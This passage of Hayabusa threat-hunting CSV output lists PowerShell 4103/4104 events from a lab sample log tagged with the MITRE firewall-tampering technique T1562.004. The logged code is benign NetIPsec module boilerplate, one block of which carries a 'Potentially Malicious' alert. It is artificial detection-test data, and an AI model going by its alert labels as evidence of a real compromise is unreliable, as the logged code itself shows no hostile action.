ParameterBinding(Set-StrictMode): name=""Off""; value=""True""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID4103-4104-2004-OpenSSH firewall rule activation.evtx 2021-04-23 19:09:45.226 +09:00,srvdefender01.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Export-ModuleMember): ""Export-ModuleMember"" ParameterBinding(Export-ModuleMember): name=""Function""; value=""""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID4103-4104-2004-OpenSSH firewall rule activation.evtx 2021-04-23 19:09:45.227 +09:00,srvdefender01.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Export-ModuleMember): ""Export-ModuleMember"" ParameterBinding(Export-ModuleMember): name=""Function""; value=""New-NetIPsecPhase2AuthSet"" ParameterBinding(Export-ModuleMember): name=""Alias""; value=""*""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID4103-4104-2004-OpenSSH firewall rule activation.evtx 2021-04-23 19:09:45.228 +09:00,srvdefender01.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Export-ModuleMember): ""Export-ModuleMember"" ParameterBinding(Export-ModuleMember): name=""Function""; value=""Get-NetIPsecPhase2AuthSet"" ParameterBinding(Export-ModuleMember): name=""Alias""; value=""*""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID4103-4104-2004-OpenSSH firewall rule activation.evtx 2021-04-23 19:09:45.228 +09:00,srvdefender01.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Export-ModuleMember): ""Export-ModuleMember"" ParameterBinding(Export-ModuleMember): name=""Function""; value=""Set-NetIPsecPhase2AuthSet"" ParameterBinding(Export-ModuleMember): name=""Alias""; value=""*""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID4103-4104-2004-OpenSSH firewall rule activation.evtx 2021-04-23 19:09:45.229 +09:00,srvdefender01.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Export-ModuleMember): ""Export-ModuleMember"" ParameterBinding(Export-ModuleMember): name=""Function""; value=""Remove-NetIPsecPhase2AuthSet"" ParameterBinding(Export-ModuleMember): name=""Alias""; value=""*""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID4103-4104-2004-OpenSSH firewall rule activation.evtx 2021-04-23 19:09:45.229 +09:00,srvdefender01.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Export-ModuleMember): ""Export-ModuleMember"" ParameterBinding(Export-ModuleMember): name=""Function""; value=""Rename-NetIPsecPhase2AuthSet"" ParameterBinding(Export-ModuleMember): name=""Alias""; value=""*""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID4103-4104-2004-OpenSSH firewall rule activation.evtx 2021-04-23 19:09:45.233 +09:00,srvdefender01.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Export-ModuleMember): ""Export-ModuleMember"" ParameterBinding(Export-ModuleMember): name=""Function""; value=""Copy-NetIPsecPhase2AuthSet"" ParameterBinding(Export-ModuleMember): name=""Alias""; value=""*""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID4103-4104-2004-OpenSSH firewall rule activation.evtx 2021-04-23 19:09:45.276 +09:00,srvdefender01.offsec.lan,4104,medium,,Potentially Malicious PwSh,"yDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Alias('Session')] [ValidateNotNullOrEmpty()] [CimSession[]] ${CimSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${AsJob}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${PassThru}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = $script:ObjectModelWrapper::new() $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('Name') -and (@('ByName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Name}) $__cmdletization_queryBuilder.FilterByProperty('InstanceID', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayName') -and (@('ByDisplayName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayName}) $__cmdletization_queryBuilder.FilterByProperty('DisplayName', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Description') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Description}) $__cmdletization_queryBuilder.FilterByProperty('Description', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayGroup') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayGroup}) $__cmdletization_queryBuilder.FilterByProperty('DisplayGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Group') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Group}) $__cmdletization_queryBuilder.FilterByProperty('RuleGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('MaxMinutes') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${MaxMinutes}) $__cmdletization_queryBuilder.FilterByProperty('MaxLifetimeMinutes', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('MaxSessions') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${MaxSessions}) $__cmdletization_queryBuilder.FilterByProperty('MaxLifetimeSessions', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('ForceDiffieHellman') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${ForceDiffieHellman}) $__cmdletization_queryBuilder.FilterByProperty('ForceDiffieHellman', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('PrimaryStatus') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PrimaryStatus}) $__cmdletization_queryBuilder.FilterByProperty('PrimaryStatus', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('Status') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Status}) $__cmdletization_queryBuilder.FilterByProperty('Status', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSource') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PolicyStoreSource}) $__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSource', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSourceType') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PolicyStoreSourceType}) $__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSourceType', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetIPsecMainModeRule') -and (@('ByAssociatedNetIPsecMainModeRule') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecMainModeRule}, 'MSFT_NetMainModeRuleMMCryptoSet', 'GroupComponent', 'PartComponent', 'Default') } if ($PSBoundParameters.ContainsKey('All') -and (@('GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('All', ${All}) } if ($PSBoundParameters.ContainsKey('PolicyStore') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetIPsecMainModeRule', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('PolicyStore', ${PolicyStore}) } if ($PSBoundParameters.ContainsKey('GPOSession') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetIPsecMainModeRule', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('GPOSession', ${GPOSession}) } if ($PSBoundParameters.ContainsKey('TracePolicyStore') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetIPsecMainModeRule', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('TracePolicyStore', ${TracePolicyStore}) } $__cmdletization_methodParameters = [System.Collections.Generic.List[Microsoft.PowerShell.Cmdletization.MethodParameter]]::new() switch -exact ($PSCmdlet.ParameterSetName) { { @('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetIPsecMainModeRule', 'GetAll', 'InputObject (cdxml)') -contains $_ } { [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('NewPolicyStore')) { [object]$__cmdletization_value = ${NewPolicyStore} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'NewPolicyStore'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'NewPolicyStore'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('NewGPOSession')) { [object]$__cmdletization_value = ${NewGPOSession} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'NewGPOSession'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'NewGPOSession'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('NewName')) { [object]$__cmdletization_value = ${NewName} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'NewName'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'NewName'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) $__cmdletization_returnValue = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{ Name = 'ReturnValue'; ParameterType = 'System.Int32'; Bindings = 'Error'; Value = $null; IsValuePresent = $false } $__cmdletization_methodInvocationInfo = [Microsoft.PowerShell.Cmdletization.MethodInvocationInfo]::new('CloneObject', $__cmdletization_methodParameters, $__cmdletization_returnValue) $__cmdletization_passThru = $PSBoundParameters.ContainsKey('PassThru') -and $PassThru if ($PSBoundParameters.ContainsKey('InputObject')) { foreach ($x in $InputObject) { $__cmdletization_objectModelWrapper.ProcessRecord($x, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } else { $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetIPsecMainModeCryptoSet.cmdletDefinition.cdxml-Help.xml } Microsoft.PowerShell.Core\Export-ModuleMember -Function 'Copy-NetIPsecMainModeCryptoSet' -Alias '*'",../hayabusa-rules/hayabusa/default/alerts/PowerShellOperational/4104_PowershellScriptblockLogging_PotentiallyMalicious.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID4103-4104-2004-OpenSSH firewall rule activation.evtx 2021-04-23 19:09:45.276 +09:00,srvdefender01.offsec.lan,4104,info,,PwSh Scriptblock Log,"yDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Alias('Session')] [ValidateNotNullOrEmpty()] [CimSession[]] ${CimSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${AsJob}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${PassThru}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = $script:ObjectModelWrapper::new() $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('Name') -and (@('ByName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Name}) $__cmdletization_queryBuilder.FilterByProperty('InstanceID', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayName') -and (@('ByDisplayName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayName}) $__cmdletization_queryBuilder.FilterByProperty('DisplayName', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Description') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Description}) $__cmdletization_queryBuilder.FilterByProperty('Description', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayGroup') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayGroup}) $__cmdletization_queryBuilder.FilterByProperty('DisplayGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Group') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Group}) $__cmdletization_queryBuilder.FilterByProperty('RuleGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('MaxMinutes') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${MaxMinutes}) $__cmdletization_queryBuilder.FilterByProperty('MaxLifetimeMinutes', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('MaxSessions') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${MaxSessions}) $__cmdletization_queryBuilder.FilterByProperty('MaxLifetimeSessions', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('ForceDiffieHellman') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${ForceDiffieHellman}) $__cmdletization_queryBuilder.FilterByProperty('ForceDiffieHellman', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('PrimaryStatus') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PrimaryStatus}) $__cmdletization_queryBuilder.FilterByProperty('PrimaryStatus', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('Status') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Status}) $__cmdletization_queryBuilder.FilterByProperty('Status', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSource') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PolicyStoreSource}) $__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSource', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSourceType') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PolicyStoreSourceType}) $__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSourceType', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetIPsecMainModeRule') -and (@('ByAssociatedNetIPsecMainModeRule') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecMainModeRule}, 'MSFT_NetMainModeRuleMMCryptoSet', 'GroupComponent', 'PartComponent', 'Default') } if ($PSBoundParameters.ContainsKey('All') -and (@('GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('All', ${All}) } if ($PSBoundParameters.ContainsKey('PolicyStore') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetIPsecMainModeRule', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('PolicyStore', ${PolicyStore}) } if ($PSBoundParameters.ContainsKey('GPOSession') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetIPsecMainModeRule', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('GPOSession', ${GPOSession}) } if ($PSBoundParameters.ContainsKey('TracePolicyStore') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetIPsecMainModeRule', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('TracePolicyStore', ${TracePolicyStore}) } $__cmdletization_methodParameters = [System.Collections.Generic.List[Microsoft.PowerShell.Cmdletization.MethodParameter]]::new() switch -exact ($PSCmdlet.ParameterSetName) { { @('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetIPsecMainModeRule', 'GetAll', 'InputObject (cdxml)') -contains $_ } { [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('NewPolicyStore')) { [object]$__cmdletization_value = ${NewPolicyStore} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'NewPolicyStore'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'NewPolicyStore'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('NewGPOSession')) { [object]$__cmdletization_value = ${NewGPOSession} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'NewGPOSession'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'NewGPOSession'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('NewName')) { [object]$__cmdletization_value = ${NewName} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'NewName'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'NewName'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) $__cmdletization_returnValue = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{ Name = 'ReturnValue'; ParameterType = 'System.Int32'; Bindings = 'Error'; Value = $null; IsValuePresent = $false } $__cmdletization_methodInvocationInfo = [Microsoft.PowerShell.Cmdletization.MethodInvocationInfo]::new('CloneObject', $__cmdletization_methodParameters, $__cmdletization_returnValue) $__cmdletization_passThru = $PSBoundParameters.ContainsKey('PassThru') -and $PassThru if ($PSBoundParameters.ContainsKey('InputObject')) { foreach ($x in $InputObject) { $__cmdletization_objectModelWrapper.ProcessRecord($x, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } else { $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetIPsecMainModeCryptoSet.cmdletDefinition.cdxml-Help.xml } Microsoft.PowerShell.Core\Export-ModuleMember -Function 'Copy-NetIPsecMainModeCryptoSet' -Alias '*'",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID4103-4104-2004-OpenSSH firewall rule activation.evtx 2021-04-23 19:09:45.277 +09:00,srvdefender01.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Set-StrictMode): ""Set-StrictMode"" ParameterBinding(Set-StrictMode): name=""Off""; value=""True""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID4103-4104-2004-OpenSSH firewall rule activation.evtx 2021-04-23 19:09:45.277 +09:00,srvdefender01.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Export-ModuleMember): ""Export-ModuleMember"" ParameterBinding(Export-ModuleMember): name=""Function""; value=""""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID4103-4104-2004-OpenSSH firewall rule activation.evtx 2021-04-23 19:09:45.280 +09:00,srvdefender01.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Export-ModuleMember): ""Export-ModuleMember"" ParameterBinding(Export-ModuleMember): name=""Function""; value=""New-NetIPsecMainModeCryptoSet"" ParameterBinding(Export-ModuleMember): name=""Alias""; value=""*""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID4103-4104-2004-OpenSSH firewall rule activation.evtx 2021-04-23 19:09:45.281 +09:00,srvdefender01.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Export-ModuleMember): ""Export-ModuleMember"" ParameterBinding(Export-ModuleMember): name=""Function""; value=""Get-NetIPsecMainModeCryptoSet"" ParameterBinding(Export-ModuleMember): name=""Alias""; value=""*""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID4103-4104-2004-OpenSSH firewall rule activation.evtx 2021-04-23 19:09:45.282 +09:00,srvdefender01.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Export-ModuleMember): ""Export-ModuleMember"" ParameterBinding(Export-ModuleMember): name=""Function""; value=""Set-NetIPsecMainModeCryptoSet"" ParameterBinding(Export-ModuleMember): name=""Alias""; value=""*""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID4103-4104-2004-OpenSSH firewall rule activation.evtx 2021-04-23 19:09:45.285 +09:00,srvdefender01.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Export-ModuleMember): ""Export-ModuleMember"" ParameterBinding(Export-ModuleMember): name=""Function""; value=""Remove-NetIPsecMainModeCryptoSet"" ParameterBinding(Export-ModuleMember): name=""Alias""; value=""*""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID4103-4104-2004-OpenSSH firewall rule activation.evtx 2021-04-23 19:09:45.286 +09:00,srvdefender01.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Export-ModuleMember): ""Export-ModuleMember"" ParameterBinding(Export-ModuleMember): name=""Function""; value=""Rename-NetIPsecMainModeCryptoSet"" ParameterBinding(Export-ModuleMember): name=""Alias""; 